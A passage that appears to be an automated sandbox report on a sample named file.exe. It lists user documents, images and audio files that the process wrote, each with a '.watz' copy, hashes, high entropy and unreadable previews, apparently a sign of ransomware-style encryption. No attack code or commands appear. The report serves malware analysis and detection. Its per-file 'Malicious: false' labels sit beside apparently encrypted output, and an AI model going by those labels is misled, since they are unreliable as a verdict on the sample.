Preview:	UMMBD.c.........GH..EBG.6.....Z......H...b/oa:k.U9p..H..\|1..L.!...8!lcE.3...c.=QJ+...#R.... ...x......Z-.t./z...m..w_......H.7..$1%.U.0 .V.o.....Q...W.(.+.Br..r...`..55.^.Vgo....$.<.....].>H.z$...${\T.....^A..2.......r.}q.2.y+lg.mgW..../6 a+..X.z.......`....U....C..od.G...lM..R...-V.m.8...E<:.x...zs..'........%..>.7".k."Z.dn..I..Ar.9....L....O.vn#...'\p/.m.W....J.QQ../.;......"I.NM!.}:.x..un%r.<4......S2u..s}..6......(............C._.<....%v=....U............S...Tx.k.$.....;.!7..MU....,c..dA....q...[X8....,i_.Q5.o..a_...&$.....6...v.....U.8.5..J.....S..Oh!..... ..........2...:o.%......f........[.U...X.7......Q.J.XpQ..##kcphH..#;...[M}LY:.[...........>....U...{d........I[.. @A..Q{......Q.C..t?V....f..n.{,...]l_._Rq8..0C..8..!...C..~.....,S...../j.....o%'8.T.G.A!. ..[...........!...HJ.P....y{.....A.+.E....t.\M"...c...:yS1.d.]L..v..>k..BY....)]Z..W.qo..`..~..x.n.R."...d.EB.....m..-E-%..M.#....... ..`...m..JY.t./.C....ya....,.@.......~.u.s..

C:\Users\user\Documents\ONBQCLYSPU\VLZDGUKUTZ.xlsx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.848295477531119
Encrypted:	false
SSDEEP:	24:mCF09PNloLRq9+StNr2/nrZVMc/z0OROylQaeBec/NkfV3wYpZg8bDUDJTtbD:VkALRu+StNQn9VMc/oO4y00c/2fVlq8E
MD5:	10A5BE67E2D1FA0DCB28D11CE197CC8A
SHA1:	21386803D4A527910EA1B632139123E18C7AC399
SHA-256:	BD195C33C2E609D1754D8BC6730BD8EC500399601D67537CD881A5838753B2CB
SHA-512:	BA065614C73E566A51E2D75F3EC7C6769E62F19B1D37181163A7023B8C5BFFD1EE6EC989DE4803006C360523BAB8BAB3E77B70FFAC62FD873BF6BD2F86D2DEF3
Malicious:	false
Preview:	VLZDG..M...x..?..^. .{3..@..L.g...mBm]Le%w........!...p......=/.....C.a.....##..a.fP.'..0}M......OcL.3#..{\|.....%..._.V..u..Q^8...g.}#.i..~......W...QU.i..Q>...2..q.....`.Qd.N.._.<v....6.0B...B@..MEPn(Y..t.....6...-I9.^..%b.S^.vH.@.%%.n........X.....(.=o#A.....U.Q`..B...M..H....P......R.=....Y..6.....]h..=;....N.k......UINh.....Z0,....i].:.iO}..>QBy...t..x0.....u%..w.[.`'.....5.....4.)7......>k.h....J.6....Z.W......"....2tv.+..[z.......a.. ..(&.R...+...Ks..fagF...\}..).(...l...;n....7R{.w(.....~....C9=..N...$..0,..n^..73.......\vB..t.c.p...K..]...W.M.N..X.B...3;.d.&.nI.<......BQ5..M...%.....x.......eY_.'.).Z...u.Jv.cH..JT.;\|u..7...q..l`.Md..1...w[K.~..u..Wo.oQ.I....4.\|l..#.t.B.}._..nJN{.....7........J...!..\...WS+...1.......l6.E8...?y]......(S.vT&....E.-v..?v.mr{.7Y!.d~...t.r.t[q.+d.....@.OA.H,Ka.t.1..}P<..............Y...R.qs.t ..hTo3.ott".j...}N...^...s.......1.........<.$.Y.N..a.@X..rE.M$.K.'[4.x.m9.ASV.#..>.a.!2.z-=.

C:\Users\user\Documents\ONBQCLYSPU\VLZDGUKUTZ.xlsx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.848295477531119
Encrypted:	false
SSDEEP:	24:mCF09PNloLRq9+StNr2/nrZVMc/z0OROylQaeBec/NkfV3wYpZg8bDUDJTtbD:VkALRu+StNQn9VMc/oO4y00c/2fVlq8E
MD5:	10A5BE67E2D1FA0DCB28D11CE197CC8A
SHA1:	21386803D4A527910EA1B632139123E18C7AC399
SHA-256:	BD195C33C2E609D1754D8BC6730BD8EC500399601D67537CD881A5838753B2CB
SHA-512:	BA065614C73E566A51E2D75F3EC7C6769E62F19B1D37181163A7023B8C5BFFD1EE6EC989DE4803006C360523BAB8BAB3E77B70FFAC62FD873BF6BD2F86D2DEF3
Malicious:	false
Preview:	VLZDG..M...x..?..^. .{3..@..L.g...mBm]Le%w........!...p......=/.....C.a.....##..a.fP.'..0}M......OcL.3#..{\|.....%..._.V..u..Q^8...g.}#.i..~......W...QU.i..Q>...2..q.....`.Qd.N.._.<v....6.0B...B@..MEPn(Y..t.....6...-I9.^..%b.S^.vH.@.%%.n........X.....(.=o#A.....U.Q`..B...M..H....P......R.=....Y..6.....]h..=;....N.k......UINh.....Z0,....i].:.iO}..>QBy...t..x0.....u%..w.[.`'.....5.....4.)7......>k.h....J.6....Z.W......"....2tv.+..[z.......a.. ..(&.R...+...Ks..fagF...\}..).(...l...;n....7R{.w(.....~....C9=..N...$..0,..n^..73.......\vB..t.c.p...K..]...W.M.N..X.B...3;.d.&.nI.<......BQ5..M...%.....x.......eY_.'.).Z...u.Jv.cH..JT.;\|u..7...q..l`.Md..1...w[K.~..u..Wo.oQ.I....4.\|l..#.t.B.}._..nJN{.....7........J...!..\...WS+...1.......l6.E8...?y]......(S.vT&....E.-v..?v.mr{.7Y!.d~...t.r.t[q.+d.....@.OA.H,Ka.t.1..}P<..............Y...R.qs.t ..hTo3.ott".j...}N...^...s.......1.........<.$.Y.N..a.@X..rE.M$.K.'[4.x.m9.ASV.#..>.a.!2.z-=.

C:\Users\user\Documents\UMMBDNEQBN.docx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.859568093045898
Encrypted:	false
SSDEEP:	24:tc9X5nO35f3zij88wNlRlFAa8kuV9thqXEqjbWTc1DHlKjjstCdybD:tEX5s5fDijUlRLAnku92hjbWTc1HujsN
MD5:	A5EA1B49039F7ADA20606615E6193E4F
SHA1:	1F5B37148AA05870B2642591F9E091ADFB38DBB6
SHA-256:	5C38CB6288F015EB8ED98CFF75794E48B91463FCA805D8176DEFED3BD7323CD5
SHA-512:	92A61E2C6C473DC9448E367396A76C24CF10FAAA0783AD1D28F7384EDD07340A5EDC7B08B4E8341F6965834E47B05F2A23406DDE38B0C3B53425868DFC484698
Malicious:	false
Preview:	UMMBDK....PK\|.Uo..^.y. \...v^.2..._]a.pZ.."....n..E.'...;a.......Y.I0..Z....g_....t...tl.7l.............[B......-...5T.tE.S.._,=.\..3!..R8.....I..5.T.+<H(.C?1+..(.MG.s...l".].O.&D...-N..7..{.'..t....+=.w.t.D....5B.....(.LU.Bu....r...IW_P....F[......K).z)q5....M.......n...^<k......z.-..9.....K..I~.....k..;/.7..5...{ Y6...T..@.. r..+..7...m...2S).aG..SM..m.G....5.3b.3$N"l.8s..A.T..T:4.3o....]..a...r;.i4...\.m......k_=Y.?..../.z.sW...he..i)0.....t....I.}..p.~.7a6.Pe.x...q..M........q!@...gA.N.....Z'..0........$_.Z^.....w.\4).....~.v..;.=..W..%...o....... ...y%n{..O.>.U.Ss;X..>....r...:...L.>..*.(....aQ%....I....O.....a..N.k.....u..g..4.q..%...[.[.I....&.T{...\|=.......\+V...S...ML..>..#[..&..%.S.r...}.c....%=..2...R.T4.`I.#..U.a.g...<.Ll.@..7.UD....-.u%...u.m..}..."..a...D.{....'?.F..9..Jo.:.d$..4.&I..w.'...f...\|\Hb..{l2..(.:. i..d..........%F.>.^IA.9k......>T...Le....c_W.!.<.......h..@].......U#.v..W.....gN...4\|aG.L.e._@f<..K.a...+.g.

C:\Users\user\Documents\UMMBDNEQBN.docx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.859568093045898
Encrypted:	false
SSDEEP:	24:tc9X5nO35f3zij88wNlRlFAa8kuV9thqXEqjbWTc1DHlKjjstCdybD:tEX5s5fDijUlRLAnku92hjbWTc1HujsN
MD5:	A5EA1B49039F7ADA20606615E6193E4F
SHA1:	1F5B37148AA05870B2642591F9E091ADFB38DBB6
SHA-256:	5C38CB6288F015EB8ED98CFF75794E48B91463FCA805D8176DEFED3BD7323CD5
SHA-512:	92A61E2C6C473DC9448E367396A76C24CF10FAAA0783AD1D28F7384EDD07340A5EDC7B08B4E8341F6965834E47B05F2A23406DDE38B0C3B53425868DFC484698
Malicious:	false
Preview:	UMMBDK....PK\|.Uo..^.y. \...v^.2..._]a.pZ.."....n..E.'...;a.......Y.I0..Z....g_....t...tl.7l.............[B......-...5T.tE.S.._,=.\..3!..R8.....I..5.T.+<H(.C?1+..(.MG.s...l".].O.&D...-N..7..{.'..t....+=.w.t.D....5B.....(.LU.Bu....r...IW_P....F[......K).z)q5....M.......n...^<k......z.-..9.....K..I~.....k..;/.7..5...{ Y6...T..@.. r..+..7...m...2S).aG..SM..m.G....5.3b.3$N"l.8s..A.T..T:4.3o....]..a...r;.i4...\.m......k_=Y.?..../.z.sW...he..i)0.....t....I.}..p.~.7a6.Pe.x...q..M........q!@...gA.N.....Z'..0........$_.Z^.....w.\4).....~.v..;.=..W..%...o....... ...y%n{..O.>.U.Ss;X..>....r...:...L.>..*.(....aQ%....I....O.....a..N.k.....u..g..4.q..%...[.[.I....&.T{...\|=.......\+V...S...ML..>..#[..&..%.S.r...}.c....%=..2...R.T4.`I.#..U.a.g...<.Ll.@..7.UD....-.u%...u.m..}..."..a...D.{....'?.F..9..Jo.:.d$..4.&I..w.'...f...\|\Hb..{l2..(.:. i..d..........%F.>.^IA.9k......>T...Le....c_W.!.<.......h..@].......U#.v..W.....gN...4\|aG.L.e._@f<..K.a...+.g.

C:\Users\user\Documents\UMMBDNEQBN.pdf

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.845384377994501
Encrypted:	false
SSDEEP:	24:gzfEuf7IEyk7uVKFJ3lseJJNzIXbIsXBR0XoWF7y/UGqHx+t6k31J6GMbmk3nbD:gDEuz/JKVuvJJNzILIsX30XosYcR+wMm
MD5:	0156ABD79E2C8E884C98DCF7DCBCE458
SHA1:	480BD3B73041CB89960D3938512D9BBED01243EA
SHA-256:	6EC92EB68F5F74CD9EA6F9180F6E876685A90301BA959B44FE70A7F5E9BE4A42
SHA-512:	B53224033247720E9A8B324F567B54727B804D6856CDD174898885108A65740281F05C62716E1D91AFA6E95629C77C19195293BD0517B7F1C122E6F8FB66E98B
Malicious:	false
Preview:	UMMBD.g.-.F..:=T9....Q.Q.<j4..6...4....."...lpN{......"....?a.M.............lb. ...#3....l.........T^...h..\|..bO...f.....P.....="wK...}....O;.rQ.J...AB........w.6E.h-....k........q.s@M..i.....\...I...{&..r%.l..lq.Z..sS.... ...:TP.EQj.A.(3..+9`.`...2tn......=.[M..&....5.q..^..U....-..w>...J.Q.Z1.........:5<6H..zk...V.7...Cc......SVP...kLD'.m..C?h.}.z4..J....x..6+.."s.YY..Y........-.....o4T%.1:72.."vO..,.zQ...T..{......J..5.xC..T.fS.~...@.E...H.9l.(yi,.....;{~c..A/EL.i..0.A..g`..:Ls..4.}7\|.9...x....3n^.V"..$K.$$.Aw5....KC.-.R.j.......2..;&#....c-v,...^....B.M.<...b..Rn..t......I./C#\c+.......Wg.^.B....hey..X.IQ..e..P8..O."..v..-...7.F.J..e7....&.....e...<[K$I.d/?...q1gB...._.E..od........=%s...K..?.....1.Y3....t..:\|.,j._].N..}..UX.1....z..DFp$.<....c....x.[w...~...?$.:.A...#.F...Ru!a..[!<....i.....'g.y\..3....s.#'y...%......A..........}..m...g...p~>u9C.^.n.N....s1&....0\|....C.\|.......@......XV...,..V..&ey....45.q...Ad........\..w..Q

C:\Users\user\Documents\UMMBDNEQBN.pdf.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.845384377994501
Encrypted:	false
SSDEEP:	24:gzfEuf7IEyk7uVKFJ3lseJJNzIXbIsXBR0XoWF7y/UGqHx+t6k31J6GMbmk3nbD:gDEuz/JKVuvJJNzILIsX30XosYcR+wMm
MD5:	0156ABD79E2C8E884C98DCF7DCBCE458
SHA1:	480BD3B73041CB89960D3938512D9BBED01243EA
SHA-256:	6EC92EB68F5F74CD9EA6F9180F6E876685A90301BA959B44FE70A7F5E9BE4A42
SHA-512:	B53224033247720E9A8B324F567B54727B804D6856CDD174898885108A65740281F05C62716E1D91AFA6E95629C77C19195293BD0517B7F1C122E6F8FB66E98B
Malicious:	false
Preview:	UMMBD.g.-.F..:=T9....Q.Q.<j4..6...4....."...lpN{......"....?a.M.............lb. ...#3....l.........T^...h..\|..bO...f.....P.....="wK...}....O;.rQ.J...AB........w.6E.h-....k........q.s@M..i.....\...I...{&..r%.l..lq.Z..sS.... ...:TP.EQj.A.(3..+9`.`...2tn......=.[M..&....5.q..^..U....-..w>...J.Q.Z1.........:5<6H..zk...V.7...Cc......SVP...kLD'.m..C?h.}.z4..J....x..6+.."s.YY..Y........-.....o4T%.1:72.."vO..,.zQ...T..{......J..5.xC..T.fS.~...@.E...H.9l.(yi,.....;{~c..A/EL.i..0.A..g`..:Ls..4.}7\|.9...x....3n^.V"..$K.$$.Aw5....KC.-.R.j.......2..;&#....c-v,...^....B.M.<...b..Rn..t......I./C#\c+.......Wg.^.B....hey..X.IQ..e..P8..O."..v..-...7.F.J..e7....&.....e...<[K$I.d/?...q1gB...._.E..od........=%s...K..?.....1.Y3....t..:\|.,j._].N..}..UX.1....z..DFp$.<....c....x.[w...~...?$.:.A...#.F...Ru!a..[!<....i.....'g.y\..3....s.#'y...%......A..........}..m...g...p~>u9C.^.n.N....s1&....0\|....C.\|.......@......XV...,..V..&ey....45.q...Ad........\..w..Q

C:\Users\user\Documents\UMMBDNEQBN\BPMLNOBVSB.png

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.823726061497269
Encrypted:	false
SSDEEP:	24:T3wXdQC7XTx1+cLvqDVwMWzLODDhondjLGEecg2itCLCFI2lr+2o8bD:T3Sd1KWvqDsqHslL0N1tCLCiA+2nD
MD5:	7B5A900A1D97FDCDC07DDAA96D1FDFAA
SHA1:	6ED72A0326F5DED9ACA24640A54926A533CCD998
SHA-256:	997CE55616B30B142A1366C619C48C2EA47B378D87E83D432A8A9CB7AF0E3E67
SHA-512:	62D552D4C6C024697071AD0F9201008BB629F8610AC7DC22EE4370264AA97D67E44CB4EE0474F0EF257193F0BB470E69E2C4BF0198D19D9DA82EC88E3B948608
Malicious:	false
Preview:	BPMLN.\|.....0c{.3k.... .eKF....\|.C........IbA...`.V.....@Io6He...n...B...l.r7{...T....oU%.y1...u{....N._dv...Pi...U....l..`..&......ms.",...R.w.h..l1Q.1.....y_...:..v.oc..Os.II.[.]q.C....o..Ir@l!.K.eA..c.q./..8)...O...0....-.vv..s~..G....]..Sn.....Z...>...Qb...o,G.....v...Y...-.R.$n.Y...@v..[.../.;......HP.f..uJ..9V.s...U.v.p9/..JBU.r..8NNw../..p..SV.W.k.....I.V....X...P..`...(.A.c....z..oM..Q..].QT..4y.wq.#..N..5.....J".t.....R./+.....`.0....~R..n.4_.M.2.u...1.rU..Z..#.?@W...%.R'...ej?s...>30.v.e...R..0...7....Z[....nfo.......N$..V..C..{..4..T...p...'..>,..3n.T$2Jr....fpf.-..].W..+z.r.B.A..3_.G.n......P.pg....c.N.({z....i.I].`..et.!.lo..`Iv........9....0T......&......1n...p.../<...O.....R.-..N}.....I4.M.Zp^.!.dv...;..j..q-.A.%V7...crZ.}....PNQ..8.TsrSa.I... .Iq.I.#..;....\..`..t..Oz ~.I..f...& .8.......P.....!>.].d....R....t.i.e!<....?"..^..x...-+......r.m...=-..........(.W...4o...vo%.z...,....%F99..~. ...7.![.....4.*.....

C:\Users\user\Documents\UMMBDNEQBN\BPMLNOBVSB.png.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.823726061497269
Encrypted:	false
SSDEEP:	24:T3wXdQC7XTx1+cLvqDVwMWzLODDhondjLGEecg2itCLCFI2lr+2o8bD:T3Sd1KWvqDsqHslL0N1tCLCiA+2nD
MD5:	7B5A900A1D97FDCDC07DDAA96D1FDFAA
SHA1:	6ED72A0326F5DED9ACA24640A54926A533CCD998
SHA-256:	997CE55616B30B142A1366C619C48C2EA47B378D87E83D432A8A9CB7AF0E3E67
SHA-512:	62D552D4C6C024697071AD0F9201008BB629F8610AC7DC22EE4370264AA97D67E44CB4EE0474F0EF257193F0BB470E69E2C4BF0198D19D9DA82EC88E3B948608
Malicious:	false
Preview:	BPMLN.\|.....0c{.3k.... .eKF....\|.C........IbA...`.V.....@Io6He...n...B...l.r7{...T....oU%.y1...u{....N._dv...Pi...U....l..`..&......ms.",...R.w.h..l1Q.1.....y_...:..v.oc..Os.II.[.]q.C....o..Ir@l!.K.eA..c.q./..8)...O...0....-.vv..s~..G....]..Sn.....Z...>...Qb...o,G.....v...Y...-.R.$n.Y...@v..[.../.;......HP.f..uJ..9V.s...U.v.p9/..JBU.r..8NNw../..p..SV.W.k.....I.V....X...P..`...(.A.c....z..oM..Q..].QT..4y.wq.#..N..5.....J".t.....R./+.....`.0....~R..n.4_.M.2.u...1.rU..Z..#.?@W...%.R'...ej?s...>30.v.e...R..0...7....Z[....nfo.......N$..V..C..{..4..T...p...'..>,..3n.T$2Jr....fpf.-..].W..+z.r.B.A..3_.G.n......P.pg....c.N.({z....i.I].`..et.!.lo..`Iv........9....0T......&......1n...p.../<...O.....R.-..N}.....I4.M.Zp^.!.dv...;..j..q-.A.%V7...crZ.}....PNQ..8.TsrSa.I... .Iq.I.#..;....\..`..t..Oz ~.I..f...& .8.......P.....!>.].d....R....t.i.e!<....?"..^..x...-+......r.m...=-..........(.W...4o...vo%.z...,....%F99..~. ...7.![.....4.*.....

C:\Users\user\Documents\UMMBDNEQBN\CURQNKVOIX.mp3

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.85540383079997
Encrypted:	false
SSDEEP:	24:362WlXWdz5m4SvjZeiPx1wN/aiuoWrhPdo3Mzt6bD:367lmd29xx1wxErF63Mzt4D
MD5:	29F3F3C36AFBFEF543F84E5E501E0303
SHA1:	FC56CEBA02458A8A2904BA66DEAB4E0F701BDA7D
SHA-256:	1633820F1DF97D501FF6803B490D1D5FEFDCEDEB11C36691CE284117035901A3
SHA-512:	8B33517AE421525E91C051CE2BD084E6B8C387CDC3D9A9F0A3E6243A44B5E2FFACAF4D2B8C48F170B1CFE69935876DF9A5354FA4519D48B943719CA324EFF5E7
Malicious:	false
Preview:	CURQN....T@.0........kJ>.U..R.........7...k...@{.4%Wpa.OfVJx..I.z....."]o....)b.77.T......C.H..EYG(BpE..k..x..c.7....[.9..q.J......h.M.7.;/oD[....9.....x..T.S$:J$}Y.t..2...c..u...O.....l}....."[3y`.>1vG.$...raV....Fx.}..yY.#. .a.M../....D.M......:.........,.:Y:..".N...(.>..#....8..W..@..u...bn.7....ER....{........-..&.dQ...fJg...Y}...s..Fzc.\.,(...yn....l+..............0.Htb..j..wG.2~.K.].8..S.~..Q.`.V.y...>.=6....,...e.Fbi.#..X....+.>..Y.wE..u.)\=(...&......x.b...;WQ..?.X...-......-...<..L...x..... ..({d...}.pc>......\....i.].....8..1..P..g.>.-....f....".)."gT<.......!...........o.rF.ga..w......6.xcgJ..9....j...3N...wk.......$.x........f........z..+<....Yj.%...[%!\|A.};...."W....=.;T.c.^.+\|.9v...w[.1...'Pi...s.X..rN..9.k..I\|...j.X[.O......4}....r...5..O.A..4.S..%i...~X.%..b..Z......s.....N..R.2.wL...n.=...n..9...2...g.^..l.]......,s.0}...9cd>kvI.S...'.%C..A.i.....]3...6U......L0......7.c..DmE.t.<.^.n......e.b.Td...}.f$'=.

C:\Users\user\Documents\UMMBDNEQBN\CURQNKVOIX.mp3.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.85540383079997
Encrypted:	false
SSDEEP:	24:362WlXWdz5m4SvjZeiPx1wN/aiuoWrhPdo3Mzt6bD:367lmd29xx1wxErF63Mzt4D
MD5:	29F3F3C36AFBFEF543F84E5E501E0303
SHA1:	FC56CEBA02458A8A2904BA66DEAB4E0F701BDA7D
SHA-256:	1633820F1DF97D501FF6803B490D1D5FEFDCEDEB11C36691CE284117035901A3
SHA-512:	8B33517AE421525E91C051CE2BD084E6B8C387CDC3D9A9F0A3E6243A44B5E2FFACAF4D2B8C48F170B1CFE69935876DF9A5354FA4519D48B943719CA324EFF5E7
Malicious:	false
Preview:	CURQN....T@.0........kJ>.U..R.........7...k...@{.4%Wpa.OfVJx..I.z....."]o....)b.77.T......C.H..EYG(BpE..k..x..c.7....[.9..q.J......h.M.7.;/oD[....9.....x..T.S$:J$}Y.t..2...c..u...O.....l}....."[3y`.>1vG.$...raV....Fx.}..yY.#. .a.M../....D.M......:.........,.:Y:..".N...(.>..#....8..W..@..u...bn.7....ER....{........-..&.dQ...fJg...Y}...s..Fzc.\.,(...yn....l+..............0.Htb..j..wG.2~.K.].8..S.~..Q.`.V.y...>.=6....,...e.Fbi.#..X....+.>..Y.wE..u.)\=(...&......x.b...;WQ..?.X...-......-...<..L...x..... ..({d...}.pc>......\....i.].....8..1..P..g.>.-....f....".)."gT<.......!...........o.rF.ga..w......6.xcgJ..9....j...3N...wk.......$.x........f........z..+<....Yj.%...[%!\|A.};...."W....=.;T.c.^.+\|.9v...w[.1...'Pi...s.X..rN..9.k..I\|...j.X[.O......4}....r...5..O.A..4.S..%i...~X.%..b..Z......s.....N..R.2.wL...n.=...n..9...2...g.^..l.]......,s.0}...9cd>kvI.S...'.%C..A.i.....]3...6U......L0......7.c..DmE.t.<.^.n......e.b.Td...}.f$'=.

C:\Users\user\Documents\UMMBDNEQBN\DVWHKMNFNN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.852143023508438
Encrypted:	false
SSDEEP:	24:I/Jj89+Uf3tgORzNF/RcoLl7No9Oprf0nyv9eGwvaSSM9YK40Jpcz30JbD:IhI9+yiazHJQGrB9gv+0wkpD
MD5:	C46C38B01405620B68FEEB1566537444
SHA1:	2E0E031D59EBAF23BC8F8BDCF1F015A1EB42A680
SHA-256:	DB7E6C06C188181DF47F4A8449AA97A3033EDC7C4ED394607D340D283CC452A8
SHA-512:	13CDFEAA0337A9AC994A279F3A195B336CECAEE4183EE33C8E1A6565499623A582B1DE0266C0C4AB912D2C696038259B0FA46D6DAF4DAFCA963AE8922880CA38
Malicious:	false
Preview:	DVWHK.L..G../......1.....7..8kH.T...1o..%.......%..R....fv...I.vC.G.aQ...f.a....X.G./.C5I.D...'..d........(...=..7^..o...J..X..G....w..#.n..W.n..{w.4^^qSj...#t."%.CB..Q../zD.L..6..W...K..u.r..w;T.Vg.7Plq....c.FU.q?.........a@.7..P.,+...!e.V.\;&n..0~......)1FZ..;...'..s...i.hC.Q...u.{-....).u.m[...E....t.#..k.C..j.../>.. ...W;..QsD..R.C}.......%.....1..'.....t..%9.7.I..f....Q......8.QhL.....r....ki..:........X..t.M.4.=........"u..~D..Fk5..@.\|......1...N.s@...B.....i..o...2x...Z.%.\...().r.........)F..a.{l.o?m+.Mg._.....U:.i."..B.}.Q~..S..N...D.JaE1..Z.......Y..J.....`.....ZeIt..{.K..m(..&..&..+..!#YI.].\|..<O.Y(h..X........X..j}...Hq.d...v.....\|..u...^..Hj.TYJ.{......N.UG..q...t.R..g..Vb..Z..7.,.H....f.....>T.^$;...T....\.w(0..X...5....~...v...:.Bd..b^..n#V9.....Z.....2&?.M....%s..+.....A.E......%.\|or...!..}..W."..."...U`e.!s.K..>..#<..iS.]F....c...4.O....=P...S~...o0.....F_.-.-8V....%.b.e........$.-..#.A..*.{F...h..u}.

C:\Users\user\Documents\UMMBDNEQBN\DVWHKMNFNN.xlsx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.852143023508438
Encrypted:	false
SSDEEP:	24:I/Jj89+Uf3tgORzNF/RcoLl7No9Oprf0nyv9eGwvaSSM9YK40Jpcz30JbD:IhI9+yiazHJQGrB9gv+0wkpD
MD5:	C46C38B01405620B68FEEB1566537444
SHA1:	2E0E031D59EBAF23BC8F8BDCF1F015A1EB42A680
SHA-256:	DB7E6C06C188181DF47F4A8449AA97A3033EDC7C4ED394607D340D283CC452A8
SHA-512:	13CDFEAA0337A9AC994A279F3A195B336CECAEE4183EE33C8E1A6565499623A582B1DE0266C0C4AB912D2C696038259B0FA46D6DAF4DAFCA963AE8922880CA38
Malicious:	false
Preview:	DVWHK.L..G../......1.....7..8kH.T...1o..%.......%..R....fv...I.vC.G.aQ...f.a....X.G./.C5I.D...'..d........(...=..7^..o...J..X..G....w..#.n..W.n..{w.4^^qSj...#t."%.CB..Q../zD.L..6..W...K..u.r..w;T.Vg.7Plq....c.FU.q?.........a@.7..P.,+...!e.V.\;&n..0~......)1FZ..;...'..s...i.hC.Q...u.{-....).u.m[...E....t.#..k.C..j.../>.. ...W;..QsD..R.C}.......%.....1..'.....t..%9.7.I..f....Q......8.QhL.....r....ki..:........X..t.M.4.=........"u..~D..Fk5..@.\|......1...N.s@...B.....i..o...2x...Z.%.\...().r.........)F..a.{l.o?m+.Mg._.....U:.i."..B.}.Q~..S..N...D.JaE1..Z.......Y..J.....`.....ZeIt..{.K..m(..&..&..+..!#YI.].\|..<O.Y(h..X........X..j}...Hq.d...v.....\|..u...^..Hj.TYJ.{......N.UG..q...t.R..g..Vb..Z..7.,.H....f.....>T.^$;...T....\.w(0..X...5....~...v...:.Bd..b^..n#V9.....Z.....2&?.M....%s..+.....A.E......%.\|or...!..}..W."..."...U`e.!s.K..>..#<..iS.]F....c...4.O....=P...S~...o0.....F_.-.-8V....%.b.e........$.-..#.A..*.{F...h..u}.

C:\Users\user\Documents\UMMBDNEQBN\JSDNGYCOWY.jpg

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.847946203093556
Encrypted:	false
SSDEEP:	24:ZjTNYY/STRVcHklHgevoBAtHC8wuHx4hmC8lzS2e9+vszHVNL7NAIiuOAbD:ZjyYrHeDvDH4ImmC8A/Xz1NL7NF7D
MD5:	9BC704BD0C38ABA6B9EA39C24532B150
SHA1:	9ACCD7ABCB6F7141943985DE2EFB632DA7C2A2C3
SHA-256:	E0F98252D1461981DA475F2940DB8E43F9A2EED2BA63D4D17FA0B35084A70EE7
SHA-512:	59AE0DAC0DA52B002A44ADDCE62A753BEC25D1B8972F904FFAC30C2D4B7FE3EB46D253C23CA3266C6D2A759258D65EB7D7CF274055319F40A5B0890F8B12E797
Malicious:	false
Preview:	JSDNG.....(..R.{.......^)%.V.WX.5C..........`.!.i..c..U..............I)v..........%e....bT.P..8r..<6..3i...mC..h..;.>.\|..u..Y.w....)..^..^?ThwJ.f.[.4e.:yy..7=U...H.rkA\.D..V.H. 2....p...V.g...........h...t.U.7.....U..>;....D....X..,}I..4.q..#G....;.#..T.J...a.`v1.4..c..5.'.R...F.X&z.I.;..........]..(.......H.\.x........Iv....W.Y?...T_......l......8]..Q+c.[.u>.Z.5.H. .G5.....x....2.2....?h/...,@t....b-.:.6e.a.=....kiK.8......5H9>../A.D"....n....P.,,....c........,Fv....4._.<\|M.z. ....V.....O..l.u.,.@...PE..b^lW.P}eZe.....[x^..y.9.'?q...d...MY%.D.....r....a7.q.b'.mQ..yj&nyy?..ao.A..hX...f_.......=f.y....A..Z+.V.D.X(..>.\\|K......T..+D.$X....s.D...+,...R3.E...e...q.iP..A.f..^.u.c. .Hj0.o..].`F4ia...[.J0.l.Mw#.....j..(.o.R.>.~W..`.]-...G.yT.E...zP..5.....Sk...">..b....w....C...".&\..*.c......ND.L..\|..(.3Z.rb.Gb......#.5~....N.......0qm.S...^......K2.-....{.......B>..m...f...'......(.qg.IVtJn)V..G..!..wh.'.D..%./...8....[...D.6\|.P..

C:\Users\user\Documents\UMMBDNEQBN\JSDNGYCOWY.jpg.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.847946203093556
Encrypted:	false
SSDEEP:	24:ZjTNYY/STRVcHklHgevoBAtHC8wuHx4hmC8lzS2e9+vszHVNL7NAIiuOAbD:ZjyYrHeDvDH4ImmC8A/Xz1NL7NF7D
MD5:	9BC704BD0C38ABA6B9EA39C24532B150
SHA1:	9ACCD7ABCB6F7141943985DE2EFB632DA7C2A2C3
